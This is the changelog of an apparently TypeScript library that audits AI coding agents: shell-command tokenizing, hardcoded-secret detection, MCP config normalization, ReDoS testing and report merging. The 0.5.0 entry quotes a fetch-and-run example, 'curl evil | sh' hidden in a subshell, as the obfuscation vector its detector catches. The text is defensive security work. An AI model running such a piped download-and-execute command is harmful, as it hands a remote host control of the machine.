+ All notable changes to this project will be documented here. The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). Under v1.0, minor versions may include breaking changes — see [CONTRIBUTING.md](./CONTRIBUTING.md#backwards-compatibility) for the rules.
4
+
5
+ ## [0.8.1] — 2026-05-22
6
+
7
+ ReDoS audit patch. Zero source changes: every regex evaluator in `src/secrets.ts`, `src/shell.ts`, `src/locators.ts`, and `src/mcp.ts` was already safe by construction (no nested quantifiers over overlapping character classes; disjoint alternation; anchored where applicable). Ships durable verification + threat-model documentation so future contributors don't have to re-derive the analysis.
8
+
9
+ ### Added
10
+ - [`docs/SECURITY.md`](./docs/SECURITY.md) — threat model for regex evaluation on untrusted input, plus what we don't protect against (the `dottedKey` argument to `lineOfTomlKey` is treated as developer-supplied; the SessionTrail-class user-supplied-pattern vector does not apply because the library never accepts a pattern from a caller). Bundled in the published tarball via the existing `files: ["docs"]` entry.
11
+ - [`test/redos.test.mjs`](./test/redos.test.mjs): adversarial harness. 18 tests, each exercising one regex evaluator against ~100 KB of input shaped to trigger the worst backtracking path the pattern could exhibit (long benign, long near-miss, nested-quantifier-style). Each call must complete under a 50 ms wall-clock budget. Current worst case is the `bash -c` payload extractor at <10 ms, three orders of magnitude clear of catastrophic backtracking.
12
+
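The shape of one such budget check can be sketched as below. This is not the contents of `test/redos.test.mjs`: the `timeRegex` helper and the sample pattern are stand-ins chosen for illustration, and `Date.now()` gives only millisecond resolution.

```typescript
// Illustrative harness shape; helper name and sample pattern are hypothetical.
function timeRegex(pattern: RegExp, input: string): { matched: boolean; elapsedMs: number } {
  const start = Date.now();
  const matched = pattern.test(input);
  return { matched, elapsedMs: Date.now() - start };
}

const BUDGET_MS = 50;

// ~100 KB "near miss": a long run the pattern accepts, then one rejecting character.
const nearMiss = new Array(100 * 1024 + 1).join("a") + "!";

// Anchored, single character class, no nested quantifiers: backtracking stays linear.
const samplePattern = /^[a-z0-9_]+$/;

const result = timeRegex(samplePattern, nearMiss);
console.log(result.matched); // false
console.log(result.elapsedMs <= BUDGET_MS ? "within budget" : "over budget");
```

A pattern with nested quantifiers over overlapping classes, such as `/^(a+)+$/`, is the kind of input this style of check is meant to catch, since its match time on the same near-miss input grows exponentially rather than linearly.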
13
+ ### Tests
14
+ - 254 total, up from 236. 18 new ReDoS pinning tests covering every regex evaluator in the four audited files.
15
+
16
+ ## [0.8.0] — 2026-05-22
17
+
18
+ Anchor release for the cross-tool meta-reviewer. Additive minor bump — one new optional field, one new validator. No breaking changes; all 0.7.x consumers continue to work unchanged.
19
+
20
+ ### Added
21
+ - `MergedReport.workflowName` (optional) — populated when `mergeFindings(reports, { workflowName })` is called. Cross-walks to OpenTelemetry's [`gen_ai.workflow.name`](./docs/INTEROP-OTEL.md) semantic convention so a meta-reviewer rolling up N tool reports for one workflow run can carry the same string downstream observability already uses. Never inferred — the meta-reviewer caller owns it.
22
+ - `MergeOptions.workflowName?: string`: opt-in entry point for the field above.
23
+ - `validateMergedReport(value)` — strict envelope check for `MergedReport`. Mirrors `validateReport` on the source side so a meta-reviewer that round-trips merged output through JSON can verify it the same way.
24
+
25
+ ### Tests
26
+ - 236 total, up from 230. 6 new cases: workflowName round-trip, workflowName omission default, validateMergedReport happy path, validateMergedReport structural/rating rejection, validateMergedReport counter/unknown-property rejection, validateMergedReport workflowName type rejection.
27
+
28
+ ## [0.7.1] — 2026-05-22
29
+
30
+ Contract-hardening patch. Two external inspection rounds (Gemini + Cody) surfaced five P0/P1 contract bugs in shipped code and one packaging fix. All addressed here. No new features; no new public exports.
31
+
32
+ ### Fixed (correctness)
33
+
34
+ - **`applyExceptions` is now order-independent.** Previously the FIRST matching rule won — a stale expired rule listed before a broader active rule would incorrectly surface the finding as expired instead of being suppressed by the active rule. Now ALL matching rules are collected; the finding is suppressed when any matching rule is active, and only re-surfaces (with downgrade) when every matching rule has expired.
35
+ - **`mergeFindings` rejects tool/finding mismatches.** Previously a forged `scope_trail` report containing `policy_mesh.*` findings would merge silently with wrong provenance. `validateReport` already rejected this; the merge path was more permissive. Now mismatches land in `invalidFindings[]` while the rest of the report still passes through.
36
+ - **`normalizeMcpCommand` no longer collides on whitespace/delimiter args.** `['a b']` and `['a', 'b']` previously produced the same canonical `args=a b` because of space-joining. Same shape for env: `{A:'1|B=2'}` and `{A:'1', B:'2'}` collided under pipe-joining. Both now use JSON encoding so distinct inputs produce distinct canonicals. **This changes the canonical-string format**; PolicyMesh's `mcp_command_mismatch` will now correctly detect previously-conflated MCP configs.
37
+ - **`createReport` clamps a downward-rating override upward to the implied max.** Previously `createReport({rating: 'low', findings: [critical-finding]})` returned a report that `validateReport` would then reject; the constructor and validator disagreed. Now `createReport`'s output always round-trips through `validateReport`. Upward overrides (rating > implied) are still honored.
38
+ - **`applyExceptions` pathPrefix now normalizes Windows backslashes and requires segment boundaries.** A finding with `src\app.ts` (Windows) now matches a `src/` prefix; a prefix `src/app` no longer over-suppresses `src/application.ts` (the match must land on a `/` boundary or be the exact path).
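The segment-boundary rule in the `pathPrefix` fix can be illustrated with a minimal sketch. This is not the library's implementation: `matchesPathPrefixSketch` is a hypothetical name, and the exact normalization steps are assumed from the changelog wording (backslashes become forward slashes; the match must be exact or land on a `/` boundary).

```typescript
// Hypothetical helper, assumed from the changelog text; the real
// applyExceptions internals may differ.
function matchesPathPrefixSketch(file: string, prefix: string): boolean {
  // Normalize Windows backslashes so `src\app.ts` compares as `src/app.ts`.
  const normalize = (p: string): string => p.replace(/\\/g, "/");
  const f = normalize(file);
  const p = normalize(prefix);
  // An exact path match always counts.
  if (f === p) return true;
  // A prefix that already ends in `/` is a segment boundary by itself.
  if (p.endsWith("/")) return f.startsWith(p);
  // Otherwise the character right after the prefix must be `/`,
  // so `src/app` does not swallow `src/application.ts`.
  return f.startsWith(p + "/");
}
```

With this rule, `src\app.ts` matches the prefix `src/`, while `src/application.ts` does not match the prefix `src/app`.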
39
+
40
+ ### Changed (visible to consumers)
41
+
42
+ - **MCP canonical-string format**: `args` and `env` now serialize as JSON. Existing PolicyMesh test fixtures may need updates if they pin the exact canonical (most don't — they pin server-identity-equivalence). Golden tests in `test/golden.test.mjs` updated to the new format.
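To see why space- and pipe-joining collide while JSON encoding does not, consider the sketch below. The function names and the exact canonical layout (`args=...|env=...`) are illustrative assumptions; the changelog only states that `args` and `env` now serialize as JSON.

```typescript
// Old-style joining (illustrative): distinct inputs can collapse together.
function joinedCanonicalSketch(args: readonly string[]): string {
  return "args=" + args.join(" ");
}

// JSON-style encoding (illustrative layout, not the library's real format).
function jsonCanonicalSketch(
  args: readonly string[],
  env: Readonly<Record<string, string>>,
): string {
  // Sort env entries by key so insertion order does not affect identity.
  const sortedEnv = Object.entries(env).sort(([a], [b]) =>
    a < b ? -1 : a > b ? 1 : 0,
  );
  return `args=${JSON.stringify(args)}|env=${JSON.stringify(sortedEnv)}`;
}
```

Under joining, `['a b']` and `['a', 'b']` both become `args=a b`. Under JSON encoding the quotes and brackets survive, so the two inputs stay distinct, and the same holds for `{A:'1|B=2'}` versus `{A:'1', B:'2'}`.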
43
+
44
+ ### Packaging
45
+ - `docs/` directory is now included in the npm tarball. The README's link to `docs/INTEROP-OTEL.md` no longer 404s on the npm landing page.
46
+
47
+ ### Cleanup
48
+ - `candidateTool` in `merge.ts` now delegates to `isToolKind` from `finding.ts` instead of carrying a hardcoded tool-list regex. Removes the fourth lockstep duplication of the ToolKind enum.
49
+
50
+ ### Tests
51
+ - 230 total, up from 220. 10 new regression cases: order-independent exception application, all-expired downgrade chain, Windows-backslash path normalization, segment-aware prefix boundary, mergeFindings tool-mismatch rejection, MCP args whitespace collision, MCP env delimiter collision, MCP env order-independence under JSON encoding, createReport rating clamp, createReport round-trip-validates contract.
52
+
53
+ ### Skipped vs Cursor inspection
54
+ - Gemini #3 (secret-pattern boundary anchors): proposed fix didn't actually fix the example given (`my-transaction-id-AIza<35>` has `-` as boundary character, so a boundary anchor still allows the match). Held for further design.
55
+ - Gemini #4 (hex token vs `GITHUB_SHA`): operationally rare given current consumer scanning paths; document-only follow-up.
56
+ - Cursor's README/package.json description / CONTRIBUTING module list refresh: pending follow-up doc PR.
57
+
58
+ ## [0.7.0] — 2026-05-22
59
+
60
+ **The pre-v1.0 consolidation release.** Bundles everything that was queued for v0.6.0 (report envelope + merge layer + OTel GenAI interop) plus two universal detectors promoted from consumer repos: `matchSecret` (from PolicyMesh) and `applyExceptions` (unifying PolicyMesh's `subject` and TaskBound's `allow_paths` shapes).
61
+
62
+ No breaking changes to the v0.5.0 surface; additive minor bump. One npm publish covers all of it.
63
+
64
+ This is the last release before v1.0 freeze. The remaining gate is consumer-side: at least one tool wiring `generateWorkflowSummary` end-to-end, then v1.0 with semver guarantees on the contract pinned by the golden tests.
65
+
66
+ ### Added — Report envelope
67
+ - `Report` interface — canonical multi-tool envelope with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, `findings: Finding[]`, and tool-specific extension `data`.
68
+ - `Report.conversationId` (optional) — agent session / PR review / thread identifier. Matches OpenTelemetry's `gen_ai.conversation.id` semantic convention so a consumer can pass the same string into both governance reports and OTel traces, then correlate them downstream.
69
+ - `REPORT_SCHEMA_VERSION` const (`'1.0'`).
70
+ - `schemas/report.schema.json` — JSON schema for the envelope, exposed via the package's `./schemas/report.schema.json` export.
71
+ - `createReport({tool, findings, ...})` — convenience constructor; sets `schemaVersion` and computes `rating` from max finding severity (unless overridden).
72
+ - `maxSeverity(findings)` — helper that returns `'none' | Severity` across a finding list.
73
+ - `validateReport(value)` — strict envelope check that also validates each contained finding and flags cross-field inconsistencies (e.g. rating below implied max).
74
+
75
+ ### Added — Merge layer
76
+ - `mergeFindings(reports, opts?)` — combine N tool reports into one normalized `MergedReport`:
77
+ - Deduplicates by `Finding.fingerprint`. Default policy: keep highest severity; `duplicatePolicy: 'first'` keeps the first occurrence.
78
+ - Optional severity `threshold` drops findings below the requested level into a counted `droppedBelowThreshold` field.
79
+ - Aggregates rating from the surviving findings, not source ratings — so threshold filtering correctly demotes the merged rating.
80
+ - Sorts findings by severity, highest first.
81
+ - Propagates `conversationId` to the merged report iff every source agrees. Cross-conversation mixing leaves the field intentionally empty so a meta-reviewer can detect misuse.
82
+ - **Never silently drops bad data**: malformed envelopes go to `invalidReports[]`, individual malformed findings go to `invalidFindings[]`. A single bad finding in a tool's report doesn't poison the rest of that report.
83
+ - `MergeOptions`, `MergeSource` (with optional `conversationId`), `MergedReport` (with optional `conversationId`), `InvalidReport`, `InvalidFinding` types.
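The dedupe-and-sort behavior listed above can be sketched as follows. This is a simplified illustration, not the code in `merge.ts`: `MiniFinding` and `dedupeSketch` are hypothetical names, and the finding shape is reduced to the two fields the rule depends on plus a message. The severity ranks follow the `low=1 … critical=4` ordering documented for `rankSeverity`.

```typescript
type Severity = "low" | "medium" | "high" | "critical";

// Reduced finding shape for illustration only.
interface MiniFinding {
  fingerprint: string;
  severity: Severity;
  message: string;
}

const RANK: Record<Severity, number> = { low: 1, medium: 2, high: 3, critical: 4 };

function dedupeSketch(
  findings: readonly MiniFinding[],
  policy: "highest_severity" | "first" = "highest_severity",
): MiniFinding[] {
  const byFingerprint = new Map<string, MiniFinding>();
  for (const f of findings) {
    const seen = byFingerprint.get(f.fingerprint);
    // Keep the first occurrence, or replace it when a higher severity
    // arrives under the 'highest_severity' policy.
    if (
      seen === undefined ||
      (policy === "highest_severity" && RANK[f.severity] > RANK[seen.severity])
    ) {
      byFingerprint.set(f.fingerprint, f);
    }
  }
  // Sort survivors by severity, highest first.
  return Array.from(byFingerprint.values()).sort(
    (a, b) => RANK[b.severity] - RANK[a.severity],
  );
}
```

Deriving the merged rating from the sorted survivors, rather than from the source ratings, is what lets threshold filtering demote the rating as the changelog describes.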
84
+
85
+ ### Added — OpenTelemetry GenAI interop
86
+ - `docs/INTEROP-OTEL.md` — explicit cross-walk between `agent-gov-core` types and OTel's [`gen_ai.*` semantic conventions](https://opentelemetry.io/docs/specs/semconv/gen-ai/). Maps `Report.conversationId` ↔ `gen_ai.conversation.id`, documents why we adopt one bridge field and not the whole namespace, and shows a paired-emission pattern for orgs running OTel-instrumented agents alongside governance tools.
87
+
88
+ ### Added — Hardcoded secret detection (promoted from PolicyMesh)
89
+ - `matchSecret(value, options?)` — scans a string for provider-prefix credentials and returns `{ provider }` (never the literal credential). Built-in patterns: Anthropic, OpenAI (sk- + sk-proj-), GitHub (PAT + classic), Slack, AWS, Google, GitLab, npm, Docker, Stripe, plus a length-restricted hex token pattern gated to env/header context to avoid commit-SHA false positives.
90
+ - `MatchSecretOptions.envOrHeaderContext` — opt-in flag for the hex token pattern.
91
+ - `SECRET_PATTERNS` — exported read-only constant table; golden-tested so additions are non-breaking but removals require a major bump.
92
+ - `SecretMatch` type.
93
+ - `env:VAR` references are never flagged (Codex notation for env-var lookups).
94
+
95
+ ### Added — Exception baselines (promoted + unified from PolicyMesh + TaskBound)
96
+ - `applyExceptions(findings, exceptions, now?)` — suppress (or downgrade-on-expiry) findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. PolicyMesh's `.policymesh-exceptions.json` shape and TaskBound's `.taskbound.yml` `ignore_kinds`/`allow_paths` shape both map cleanly onto this unified primitive.
97
+ - Expired exceptions don't silently drop; they re-surface with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix so stale baselines stay visible. Reason text propagates to `finding.data.exceptionReason`.
98
+ - `validateException(value)` — runtime check for well-formed exception entries.
99
+ - `Exception`, `ApplyExceptionsResult` types.
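The suppression and expiry rules above, combined with the order-independent matching described for 0.7.1, can be sketched like this. The types and `applyOneSketch` are hypothetical and match on `kind` only. Treating an unparseable `expires` as never-expiring follows the test list in this changelog, but the expiry boundary (strictly after `now`) is an assumption.

```typescript
type Severity = "low" | "medium" | "high" | "critical";

// Reduced shapes for illustration; the real types carry more fields.
interface MiniFinding { kind: string; severity: Severity; message: string }
interface MiniException { kind: string; expires?: string }

type Outcome =
  | { status: "kept"; finding: MiniFinding }
  | { status: "suppressed" }
  | { status: "expired"; finding: MiniFinding };

function isActiveSketch(rule: MiniException, now: Date): boolean {
  if (rule.expires === undefined) return true; // no expiry: perpetual
  const t = Date.parse(rule.expires);
  // Malformed dates are treated as never-expiring.
  return Number.isNaN(t) || t > now.getTime();
}

function applyOneSketch(
  finding: MiniFinding,
  rules: readonly MiniException[],
  now: Date,
): Outcome {
  // Collect ALL matching rules instead of stopping at the first one.
  const matching = rules.filter((r) => r.kind === finding.kind);
  if (matching.length === 0) return { status: "kept", finding };
  // Any active match suppresses, regardless of rule order.
  if (matching.some((r) => isActiveSketch(r, now))) return { status: "suppressed" };
  // Every match has expired: re-surface, downgraded and prefixed.
  return {
    status: "expired",
    finding: {
      ...finding,
      severity: "low",
      message: `[EXPIRED WHITELIST] ${finding.message}`,
    },
  };
}
```

Because the decision depends only on the set of matching rules, listing a stale rule before an active one gives the same result as the reverse order.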
100
+
101
+ ### Tests
102
+ - 57 new cases. 220 total (up from 163). Breakdown:
103
+ - Report: 17 (schemaVersion pinning, rating derivation, explicit-rating override, validateReport accepting/rejecting envelope-level errors, finding-tool consistency, unknown property rejection, downgrade-allowed/upgrade-flagged rating consistency, conversationId passthrough + type check).
104
+ - Merge: 14 (empty input, cross-tool combine, fingerprint dedup with `highest_severity` and `first` policies, salientKey-disambiguated findings stay separate, threshold filtering, malformed report → invalidReports, malformed finding → invalidFindings, severity-sorted output, aggregate-rating-reflects-survivors, source provenance, conversationId agreement/disagreement/partial-coverage propagation).
105
+ - Secrets: 11 (each provider class detected, env: refs never flagged, empty/short input ignored, hex token gated to env/header context, non-hex 40-char string rejected, never-leak-literal contract, golden-pinned `SECRET_PATTERNS` provider set).
106
+ - Exceptions: 15 (empty input identity, suppress by kind/salientKey/pathPrefix, perpetual-active when no expires, expired surfacing with downgrade/prefix/reason, non-matching kind/salientKey passthrough, pathPrefix without location.file safely non-matches, malformed expires treated as never-expires, future expires stays active, validateException accept/reject paths).
107
+
108
+ ## [0.5.0] — 2026-05-22
109
+
110
+ Three additive features completing the queue from Gemini's third inspection round, plus five correctness fixes from a deep code-level inspection done before publish. No breaking changes: existing exports and call signatures are unchanged.
111
+
112
+ Minor bump (not patch) because the surface grew: three new top-level exports.
113
+
114
+ ### Fixed (pre-publish inspection sweep: Gemini + Cody)
115
+ - `tokenizeShell` no longer splits on `&` inside file-descriptor redirections (`2>&1`, `>&2`, `<&3`). The single-`&` separator rule now checks the preceding non-whitespace character.
116
+ - `tokenizeShellDeep` no longer false-positives on `bash -c` text inside double-quoted echo arguments. Previously a whole-string regex matched `bash -c` anywhere, including data being printed. Detection now runs inside the quote-aware walk and only fires at command boundaries outside quoted regions.
117
+ - `updateMultilineStringState` (TOML locator) now tracks backslash escapes inside basic multi-line strings (`"""…"""`). An escaped `\"""` inside the value no longer prematurely terminates the string-state walker, which had caused decoy keys to match. Literal strings (`'''…'''`) intentionally don't track escapes per TOML spec.
118
+ - `lineOfTomlKey` now finds dotted keys nested under any prefix table, not just at file root. `[a]\nb.c = 42` is now reachable as `a.b.c`. Same shape as the v0.4.4 top-level fix, generalized.
119
+ - `lineOfTomlKey` now matches spaced dotted keys (`a . b . c = 1`) which `parseToml` had always accepted but the locator's compact-only regex couldn't find. Pattern now builds from individual segments joined by `\s*\.\s*`.
120
+ - TOML parser correctly handles a line-ending backslash followed by trailing inline whitespace before the newline. Per spec, `"""line\ \nnext"""` strips the newline and trims leading whitespace on the next line. Previously the trailing spaces caused the backslash to be treated as a regular escape (which silently kept everything literally rather than throwing, but still wasn't spec-compliant).
121
+ - `normalizeMcpCommand` now treats common boolean long-flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--no-cache`, `--no-color`, `--no-progress`, `--json`, plus short forms `-v -V -q -h -d`) as standalone instead of greedily pairing them with the next positional. Configs with `--verbose pkg` no longer normalize differently depending on flag order.
122
+ - `normalizeExecutable` (MCP) now lowercases Windows-shaped executable names (those with `\` separators or `.cmd`/`.exe`/`.bat`/`.ps1` suffix) so `NPX.CMD` and `npx` produce identical identity strings. POSIX paths keep their case because `./curl` and `./CURL` are genuinely different files there. The JSDoc had claimed this behavior since v0.1; only now does the implementation match.
123
+ - `normalizeExecutable` (MCP) also drops the directory portion of paths whose basename matches a known runtime (`node`, `npx`, `python`, `bash`, etc.). `/usr/local/bin/node`, `/usr/bin/node`, `node`, and `C:\Program Files\NodeJS\node.exe` all produce `cmd=node` now. Closes a long-standing PolicyMesh `mcp_command_mismatch` false-positive class across cross-platform team setups. Custom scripts at absolute paths (`/opt/internal/orchestrator.sh`) keep their full path because path is part of their identity.
124
+ - `generateWorkflowSummary` now HTML-escapes `<`, `>`, and `&` in message cells. A finding message containing `</summary>` or `<h1>` could otherwise break out of the wrapping `<details>` block and manipulate the rendered layout of the GHA step summary page.
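The HTML-escaping fix for `generateWorkflowSummary` can be illustrated with a small sketch. `escapeHtmlSketch` is a hypothetical name and the entity choices are an assumption; the changelog only says that `<`, `>`, and `&` are escaped in message cells.

```typescript
// Hypothetical helper; the library's actual escaping routine may differ.
function escapeHtmlSketch(message: string): string {
  return message
    // Escape `&` first so the entities produced below are not re-escaped.
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}
```

After escaping, a message such as `</summary>` renders as literal text and can no longer close the wrapping `<details>` block.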
125
+
126
+ ### Added
127
+ - `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c ""` / `sh -c ""` / `python -c ""` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $()`. Single-quoted text is left untouched (literal per shell semantics). Conservative implementation — handles common shapes, not a full shell parser; nesting depth capped at 8.
128
+ - `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. `readJsonObjectWithSource` and `readTomlObject` now wrap their underlying parser errors with this type whenever a byte offset can be recovered. Lets downstream tools emit a `*.config_syntax_error` Finding pointing at the exact spot without recomputing line numbers.
129
+ - `lineColumnOfOffset(text, offset)` — utility to convert a 0-based byte offset to 1-based `{ line, column }`. Pairs with the new error type.
130
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks; escapes pipe/newline in message cells; truncates long messages; caps per-severity rows with an overflow indicator. Closes the GHA annotation-cap visibility gap (10 per level, 50 per run silently dropped) by guaranteeing 100% of findings appear in the workflow summary page.
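The offset-to-position conversion behind `lineColumnOfOffset` can be sketched as below. This is an illustration, not the shipped function: it indexes the string by UTF-16 code unit rather than by byte, and clamping out-of-range offsets is an assumption.

```typescript
// Hypothetical re-implementation for illustration only.
function lineColumnOfOffsetSketch(
  text: string,
  offset: number,
): { line: number; column: number } {
  // Clamp so out-of-range offsets still resolve to a position (assumed behavior).
  const end = Math.max(0, Math.min(offset, text.length));
  let line = 1;
  let lineStart = 0;
  for (let i = 0; i < end; i++) {
    // Every newline before the offset starts a new 1-based line.
    if (text.charCodeAt(i) === 10) {
      line += 1;
      lineStart = i + 1;
    }
  }
  // Column is 1-based, counted from the start of the current line.
  return { line, column: end - lineStart + 1 };
}
```

A parser that reports only a raw offset can then be wrapped into a `{ line, column }` pair of the kind `ConfigParseError` carries.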
131
+
132
+ ### Changed
133
+ - TOML parser semantic errors (`Duplicate key`, `Duplicate key in inline table`, `Duplicate table definition`, `Cannot redefine array-of-tables …`) now include `at offset N` in the message so `readTomlObject` can resolve them to a line.
134
+
135
+ ### Tests
136
+ - 55 new cases. 163 total (up from 108). Coverage:
137
+ - tokenizeShellDeep: subshells, backticks, `-c` payloads, single-quote literal handling, nested subshells, no-op pass-through, integration with `getCommandHead`. (9 cases)
138
+ - parse-error: offset line/column conversion (5 edge cases), structured wrap on JSON and TOML, `parseToml` direct call unchanged, `cause` preservation. (10 cases)
139
+ - generateWorkflowSummary: empty findings, severity ordering, totals, pipe/newline escape, truncation, per-group cap with overflow, missing location, HTML escape, ampersand escape. (9 cases)
140
+ - Inspection regressions: 14 cases covering `2>&1`, escaped `\"""`, table-nested dotted keys, line-ending backslash, known-boolean flags, quoted `bash -c` data, Windows case-folding, POSIX case preserved, spaced dotted keys, path de-noise across platforms, custom-script identity preservation.
141
+ - **Golden compatibility tests** (`test/golden.test.mjs`): 11 cases pinning specific fingerprint hashes and `normalizeMcpCommand` canonical strings. These are the contract: breaking them requires a major bump and migration plan.
142
+
143
+ ## [0.4.4] — 2026-05-22
144
+
145
+ Cody-led inspection (third reviewer, third round) caught five issues, two of them P0 regressions I introduced in my own v0.4.2 / v0.4.3 fixes. All five fixed here.
146
+
147
+ ### Fixed
148
+ - **P0**: `fingerprintFinding` no longer appends an empty-string segment for findings without `salientKey`. v0.4.3 added `?? ''` which silently changed the hash for every existing finding and broke the v0.4.2 → v0.4.3 backwards-compat claim in my own changelog. Pinned by a new test that asserts the specific v0.4.2-form hash for a salient-less finding.
149
+ - **P0**: TOML parser no longer rejects valid subtable headers repeated under separate array-of-tables entries. `[[fruits]] [fruits.physical] [[fruits]] [fruits.physical]` now parses correctly — each `[[fruits]]` entry resets the "already defined" status of subtable paths under that AOT. My v0.4.2 `definedTables` guard was global per-file when it should have been scoped to the current AOT entry.
150
+ - `lineOfJsonStringValue` no longer matches occurrences in key position. Searching for value `"command"` in `{"command":"npx", "args":["command"]}` now returns the array-element line, not the key. Negative lookahead `(?!\s*:)` after the closing quote.
151
+ - `lineOfTomlKey` now finds top-level dotted keys. `lineOfTomlKey('a.b.c = 1', 'a.b.c')` returns 1 instead of 0 — the dotted-key check was gated behind `inTargetTable` which is false at file root.
152
+
153
+ ### Changed
154
+ - `package-lock.json` resynced to 0.4.4. Was drifting at 0.4.2 because previous releases bumped `package.json` without running `npm install` to refresh the lockfile.
155
+
156
+ ### Tests
157
+ - 6 new cases: pinned v0.4.2-form fingerprint hash, JSON value-vs-key disambiguation (+ colon-in-value sanity check), top-level dotted TOML keys, AOT subtable repeat across entries (+ within-entry duplicate still rejected). 108 total (up from 102).
158
+
159
+ ## [0.4.3] — 2026-05-22
160
+
161
+ Third Gemini-inspection round caught one confirmed bug, one disguised-as-suggestion bug, and three feature opportunities. Both bugs fixed here; the feature work is queued for v0.5.0.
162
+
163
+ ### Added
164
+ - `Finding.salientKey?: string` — optional discriminator that participates in the fingerprint hash. Set this when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on the same line, two MCP servers in the same JSON object). Without it, the meta-reviewer would dedupe them into one. Use stable values only: package name, server name, rule id; not timestamps or counters.
165
+ - `CreateFindingSpec.salientKey` — pass-through to the new field.
166
+ - Schema gained `salientKey` under properties (still optional, schema's `additionalProperties: false` updated to permit it).
167
+
168
+ ### Fixed
169
+ - `fingerprintFinding` now includes `salientKey` in the hash. Two distinct findings of the same kind on the same line with different `salientKey` values now produce different fingerprints. Backwards-compatible: findings without `salientKey` still produce stable, identical fingerprints to v0.4.2 for the (kind, file, line, column) tuple.
170
+ - `lineOfTomlKey` now tracks multi-line basic (`"""`) and literal (`'''`) string state and skips key matching on lines that fall inside one. Previously a decoy key inside a multi-line string value could be matched as if it were a real assignment — confirmed bug with sharper reproduction than Gemini's first-round example.
171
+
172
+ ### Tests
173
+ - 7 new regression cases. 102 total (up from 95). Covers salientKey discrimination, backwards-compat for fingerprints without salientKey, validateFinding type check, decoy-in-`"""`, decoy-in-`'''`, single-line `"""..."""` (must NOT enter multiline state), and a plain-TOML sanity check that the fix doesn't over-correct.
174
+
175
+ ## [0.4.2] — 2026-05-22
176
+
177
+ External code review (Gemini, second pass) caught four correctness bugs and one source-cleanliness issue. All five fixed here.
178
+
179
+ ### Fixed
180
+ - `lineOfJsonKey` and `lineOfJsonStringValue` now JSON-encode the search input before building the regex. A caller passing the *decoded* value (e.g. `C:\Temp` from a Windows-path field) now correctly locates the JSON source bytes (`"C:\\Temp"`) instead of returning 0. Affects CapabilityEcho's `package-scripts` detector for scripts containing quotes/backslashes.
181
+ - `lineOfJsonKey` and `lineOfJsonStringValue` now scan over `stripJsonComments(text)` instead of raw text. A commented-out `"command": "fake"` no longer shadows the real key on a later line. The strip is position-preserving so returned line numbers still reference the original source.
182
+ - `getCommandHead` now strips wrapper flags (`sudo -E`, `env -i`) after recognizing a wrapper, so `sudo -E curl ...` returns `curl` instead of `-E`. SessionTrail/CapabilityEcho shell detectors no longer miss wrapped curl/wget invocations. Known limitation: short flags taking a value (`sudo -u user curl`) still misclassify as the value — documented and pinned by test.
183
+ - TOML parser now rejects a standard table header (`[items]`) that follows an array-of-tables header (`[[items]]`) with a `Cannot redefine array-of-tables` error. Previously the standard table silently descended into the array's last entry, letting writes leak into `items[0]`. Spec compliance fix.
184
+ - TOML inline-table parser now rejects duplicate keys with `Duplicate key in inline table: ...`. Previously `server = { host = "a", host = "b" }` parsed as `{ host: "b" }` — the standard-table guard wasn't mirrored on inline tables. Spec compliance fix.
185
+
186
+ ### Changed
187
+ - Source cleanup: the two `keys.join` calls in `src/toml.ts` now use a named `PATH_KEY_SEPARATOR = ''` constant instead of literal NUL bytes embedded in the source. Same runtime behavior (NUL as the delimiter, which is illegal in TOML keys so collision-proof), but `rg`/`grep` no longer treat the file as binary and `file(1)` reports it as proper text.
188
+ - README: `rankSeverity` doc corrected — was `none=0…critical=4`, actually `low=1, medium=2, high=3, critical=4`. The schema has no `none` severity.
189
+ - README: `normalizeMcpCommand` signature and behavior description corrected. It was listing a non-existent `serverUrl` field and claiming "resolves npx/uvx invocations", which doesn't happen. Now accurately lists: drops neutral confirm flags, strips Windows executable suffixes, sorts non-neutral flags alphabetically, preserves positional argument order, includes env + cwd in identity.
190
+
191
+ ### Added
192
+ - 7 new regression tests: encoded-value lookup, commented-out shadow, wrapper-flag unwrap (+ edge-case pin), AOT-vs-table mixing, inline-table duplicate keys.
193
+
194
+ ## [0.4.1] — 2026-05-22
195
+
196
+ ### Fixed
197
+ - `fingerprintFinding` now normalizes Windows-style backslash paths to forward slashes before hashing. A finding emitted on Windows and the same finding emitted in Linux CI now collapse to the same fingerprint — previously they'd diverge and break cross-platform dedupe. Caught by external code review.
198
+ - `normalizeMcpCommand` now preserves the relative order of positional arguments that appear after a flag. Previously `['--flag', 'x', 'a', 'b']` and `['--flag', 'x', 'b', 'a']` collapsed to the same canonical identity because the post-flag positional keys were co-sorted with flag pairs. PolicyMesh's `mcp_command_mismatch` would under-report under this bug. Caught by external code review.
199
+
200
+ ### Changed
201
+ - `stripJsonComments` and `stripTrailingCommas` no longer carry the dead `"'"` (single-quote) state in their string tracker — JSON strings are double-quoted only. Pure type/comment cleanup, no behavior change. Caught by external code review.
202
+
203
+ ### Added
204
+ - Regression tests for both fixes:
205
+ - `fingerprintFinding`: identical fingerprint across Windows and POSIX path separators.
206
+ - `normalizeMcpCommand`: differing post-flag positional order produces different identities; flag order independence preserved.
207
+ - `CHANGELOG.md` is now shipped in the npm tarball.
208
+
209
+ ### Internal
210
+ - `package.json` `files` allow-list trimmed to exclude `.js.map` / `.d.ts.map` sourcemaps from the published tarball. The maps referenced `src/*.ts` source files that aren't shipped, so they were dead links anyway. Tarball is ~27% smaller (32.4 kB → ~23.6 kB).
211
+
212
+ ## [0.4.0] — 2026-05-22
213
+
214
+ ### Added
215
+ - `JsonObjectWithSource.value` — new field that mirrors `json`, populated identically. Use this in new code; `json` is kept as a populated alias.
216
+ - `TomlObjectWithSource.value` — same pattern for the TOML reader.
217
